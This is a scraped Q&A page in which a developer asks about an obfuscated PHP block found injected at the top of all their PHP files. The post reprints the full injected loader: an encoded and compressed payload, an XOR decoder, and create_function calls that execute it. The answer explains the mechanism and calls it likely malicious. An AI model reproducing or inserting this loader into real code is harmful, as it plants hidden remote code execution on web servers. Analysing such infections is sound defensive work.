Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

Unexplained code appearing in all php files

Tags:

php

base64

eval

I have this code on top of all my php files in the source control somehow

Can you someone please shed some light on what this is?

EDIT: I know its most likely bad, I know that it is trying to create functions. But what exactly are those functions going to do? It is too jumbled!! If some one can spend some time on this, then hats off to them.

Otherwise, I am attempting this tomorrow with a fresh mind.

Thanks fellow stackoverflowERS for all the help :)

<?php
     $qhtgndmn;
    $qhtgndmn = array(
        '$qhtgndmn[0]=array_pop($qhtgndmn);$twpxkaml=twpxkaml(1,13);$qhtgndmn[0]=$twpxkaml($qhtgndmn[2]);',
        '$qhtgndmn[2]=gzuncompress(twpxkaml(696,2300));',
        'cH5/V3l1ZWl1eHx6Z31PZHVhUmRpcWxreVl9eWV4ZnFoWGh/cGlzel1ZRUlGXF5QUktLSkRWQF5QRGVwcH11Ym14fXhpbHltdEF3Q3lEUURCWFlJd1NLWG12dnBac2R6SlVEXk9CTldCX1Zwe3FkaWFldSh6fm03MTk8L1ptTC0+JSY8WURuQnhuPyhhVUFVMGx1REtMayJScWhIUExDRTVHIkVBQm55cWRieGNHfn95b2Z1On5sZW1pKmtkc31lPWpjfnZlYnkpa3JnZ3VtO29pZHR0f2h3VmVYakN6dnYjPzlVUUduUURCWFVYXlRZSmV7cWVtPCROY2hubWJkInB0cH94I3l1fWJueWxuY0NDcDJrYXh5S1VHXU9DRVhYX0tnalpTQldKU0RBWkROSUxAR253UUhFU1pTT0JTX0RMQVBwViZRd1FEQlhVRUJCX1JDQURHUVVLRzZ0c34lY3lqUG1ZNmdmJWl/f3NoY3YpYmhmcnxvTXNsYHpna3ROc2B9XWJoe3FhYU1dRmRNVVtYUmphaE1dRkxDQkRZeDZke3glPndoY3kvc29gfVZNNmR7eCU+WERIIHdoaHFTNmR7eFZHdTZnZiVpf39zaGN2KXR5aXV4dGVUZnpEWEt/f2Rrb3ROY2R/Z1U3TFg3fHlvQ2thbm1lVk94ZkZ2THwhOGlkcX1+eWRhZy9md31sTWltaThgY350c3cjbGN1Q3F6Z3siOG5lf3NmfyNsY3U2Z2YlaX9/YWRqLHZpeTpvJEJsYz97K2JpU0I/ZCt4YmA3dzBOZD9mK0JDaFR6ZWRkVXBrUG0oYVdxZGJ4MD8+SFR2ZUo/ZytubXNycnB+f3xXUkh0V2RqdWJnemRRP2cra39ZeWdNfGhza0M/Zyt7YTBZU1ldLTcvOWlmUX9lfDAwaWw2cVZDYYyTEGN/ykH7oo4DNClEXPk9vz6xJkNyFmFoAY9aZftjFYgaJ07zJkdH8dn67yUjjfR69CvErfxz' . 'PlOOhSI6Erok5o1bA6nMJSDxxqq7Zz6Tz0YM+qBfuifH0GOxhs+wDbow12WMNREZRJOhI0++l8t4Tw5fHyIiTltPV1fM7hFJ3YY8UyVVXgz9dUIU4cSgOEmkMqnEBofXWVQzC2SQWdK2X/7j9mEPkL0WwFQXY2sKlpefbbtyupzcOtn64iETbtX9Qk7Pwd967v8wtNauzZFXoZ3kp/wTiH4SRs0xhWW3e1FBFHdv1//KCGIEG8OhKz/l3Nxc+l2fFeUdd3PIiobJ74PHLiHY93h9Dl7SFoFOFD1Os3+NcrhX22NUzURgdwvm8YtAHxwpXnsWs4jMGYdYLF0SWTks8X7DKwPzDCsET1IZ9XAr8+uQMuo9xfz+i64uMaIbefcL8+uahwpD+y69nfBST5p6vTY9+9Xi/RlejL9xwyp1mKyQ2cEiBCimYZzHIf0+5iE7Ytc1+ihMNfFv3lMdvffIz6Rq76MNy4gOQpJNWsVU3UcunOlr4r1hlCd35t+7KxDLiLFJD4SJxJSjOkEWl0UU8Am/rSkAd' . 'dMpbneYjz2YP+nXJu1ckKjtYP4VX8Vd7OQLb8cObiiTTw93W1gCp/LimsjhmYrOYpzvYtQicT2nsr5091XeGnWm+m2oxbsqUi5QGjMSSJbMvME7PFQPWU8aCUsopHbmPyxOJs7dPzBCNQBUhUr+8mrOcsbX3aMkjMynJ0ASbG0d4EnF6943KEQWqZMFe8tU/m+HcJuDssyWHmVxGWA4x2QQi1fYAD2act1p09RQf4irmqJinYdfG4y/AX0WaEImy9C5FeB8Mj5UGv18pAZ9O3O50cvTfmWRs0yroVieP6ZPPW0pDpCtOvE+jfTzyFhwOHazWYAu4ag+iHpWrU+OFZhUJX520KzaJnLAzA5N0wmDvdgoYtpnQ2eam7hil1t0F3KohSXhk91FTghMnhQdWbY+bC6V6EfO2QzAmTbDk+4nqyTmweMaYaDQ+bSmzZtMHmX5aH1MP0x/hQ6Jcf/uzJaShQKLP+N/PIId4atvXc9dyAW7OjubhFTkCuYwwLiI3CSGoWrJGXFIA3ThehZygyutB4TJqii14hrRJF5DJBfO/TB8lh9+k/W3RafZO5e' . 'O3602dC3+gik0rzVJwF0tvByeQdNlc8pi0zx6q0uAD2dFiVJls2FZebcUA9mABrO30vdbMfyabEldMkX+po+PkL63xJiahC4thVL1e4nWFcFxV9x7Ghfko/lu90HQKx20M6lw6H7zB2e+lso7K/NHiHefufUP7ACFPggcfLY/PKjdR4mrf0uMlGfF3NkU1wxbEDp7S8TBADcyvW1sTZenmKjRuynMZWsgzpaL1GbdxbxqCcZ8j0c07+9+9P1nxHvJgc8ivprlNJVvafZckzzR55LRxi5oUiaHczCE/tj3cDq+OfybEHUd+nqBkEibSrnxnsgNQnICSqIiqfWQU9Pnm2PW6cqe6R3SvK+fO9WnuVYr2L62smMwZDENU9H9zyS1odWMnmQI2LYiT46UblsDR8QGxakmpDGM8kSeob1ac0razk2DerXttvrtkQW7DlUcbSAfgNhxjMD2c8VjTndaD2CTLuTE0Q/bza7bj4pexmWS4cdEBm0jInUKQzvYuuu9WV14NebJmYGGomjoploNyVNTLEVcRGA6n51v2kKmfvT9ouHg4vjyT+H86rbFPfntj3yJBa4w+FNFEwimiXDzu0aGl+QFR0nwARSe1duCyC33NUkzMf0rbdtiXkmX5cfIhTW0pbrR7jutZABUcK8JONEOKUSKuMCwzxv/6JoX5z11J0a+btMArNMbz+UAMxhmxv/5FPW+RPM52gHCrXkpn/uXTuvUYWCr3Ks+fg9VggsdQuJGVWm2oM3lVeHAG5dCyqJtjl+OY8FwuP7PJNgCH+w2jS3dxXxGbX919c3BxDpGZ9imENYwU7K4h7LQ1zTytBETjPI3haqXM3cC3XJ4iOpmhB/mqTMBtAhNfNSuJyRqyA97ITUsCy3ZMzJ+f+schIIrwN/9mIowJNokAc1Z84Rdd5UCkeYeZeubY7Ar7d86uVCF8qvhptLc4KvF53MMazOLcfYczkf5F2oQSqaVOx/H' . '5Rv6TWovgn7QIn0Shle5p6H+uaNOEi9oHmR6ClizijBY+TyDkVSuL/CQM99uXwytsY5QV788xxL08zWRjeCRQCrmYH2f8t2+oPw2pc9qtpIqhgUvuWsUw6APob+QwEsyUuiHhnJPYSs3vvgUZbAJvIRESJ/uvRqQVOcH2jg+VlWE9JfJcaeKevHOB/eBLM/GJ3rGFU/3H6qkac4SfQ+HxEu8C+22F/gWC8tsuzul/NdMlSeuxdhlmj1JrFjms6HUv2g5bqPd5AFVhFde6u5nTXLMnAypnv/UoSv5y57w5IPqH6jlcEWLEOZzITGg2sdCLdWgyZTe7L6pnRcKDOdl6SCNsCq35lEzPNgQQFccoeY6hbhB7NyFoHWkZqzgJu+6UN/HXAaI0SGB9ENyTha63Hfxe5rKdmfzoz0PS5uSleltbId57Q+eZgNQh9SRfiHt7ID7+nliqZJNuM1jfbq9f0ES2U704OT23s7loST10r2TudVGhk/wIdBHxSrqMMo6hLw/teHuifLihrlZFobhS/fXnoeBt76I+kKNcfZWexkb5ekadmipuIr44u/iFo6dtl+2J8SUIdzKml5nSR99mBWfo7OlwhK/nS8NnmKoG37mgoPyGlRSjyIXV1/EbRKH+L2Jtk6A/1Jr04RwMeM+o9yFzc+dfYJhONPKcIa9TX/Ndn/zlCFp/7Xy+O8S5zljlOOydS4J0CIBcGFX+DfnfTdMpFwXP5VrFXwyc0fThx+5f1qz5RSWuxQry/CBEgnB1utKv2qc+g2T7hoC2uaSlRbnAXzwShfC9rYXUsvGpQH8V+6/OIok6YJabTr9feok9s43ifz15urUgIQxlBmPiwoYvSUDWe453LIFe+7nd/L0e5rCWr/uBqIDgnVZZVFre3FlbTwkTmNobm1iZGxY',
        "f\x7bqem\x3c\x24Nchnmbd"
    );
    $hvnlvgr  = 'create_';
    if (function_exists($hvnlvgr .= 'function') && !function_exists('twpxkaml')) {
        function twpxkaml($d, $j)
        {
            global $qhtgndmn;
            $v = str_pad($g = 'yPvhJ0qgMmbfaIEZ', $j, $g);
            $e = str_repeat("\x1f", $j);
            $f = str_repeat("\xe0", $j);
            $n = substr($qhtgndmn[0], $d, $j);
            return (($n ^ $v) & $e) | ($n & $f);
        }
        ;
        for ($xv = -1; ++$xv < 3; $hvnlvgr('', '}' . $qhtgndmn[$xv] . '{'));
    }
    ;
    unset($qhtgndmn);

    var_
     ?>
like image 577
Vish Avatar asked Sep 26 '22 15:09

Vish

1 Answers

Looks like it's creating three anonymous functions with create_function, to execute obfuscated code it's hiding in the $qhtgndmn array and either decoding or obfuscating further with twpxkaml.

So assume it's malicious. Or by someone really, really bored. Check the commit log.

like image 132
Tom Avatar answered Oct 06 '22 01:10

Tom
Sign in to Comment

Related questions

php 7 file is downloaded instead instead of executing [duplicate]
Configure Dutch format for date in Laravel
How to autoload Composer packages in CakePHP 2 Travis integration
Extract Json response
PHP: Ignore key and extract value of an array
Difference between two strings with time and weekday
fetch returns only one row when i get it from cache
Why is my event listener not firing in laravel 5?
PHP verify failed with LetsEncrypt
Laravel 5.1 - Pass parameter to Breadcrumbs
DatePicker : Cannot set property 'currentDay' of undefined when multiple array id
how to create pagination links from json data in laravel blade
Updating multiple rows using Yii's updateAll()
MySql prepared statements in a loop
How to do PHP array_intersect by keys not by values?
Why do "Strict Standards" not Apply to PHP constructors? [duplicate]
How to deal with ROLES and FOSOAuthServerBundle scopes
Make a POST request with file and text from an Android application
Eclipse - Using File Name Conventions on Refactoring php-Classes
Authenticating Mandrill Webhook with PHP

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!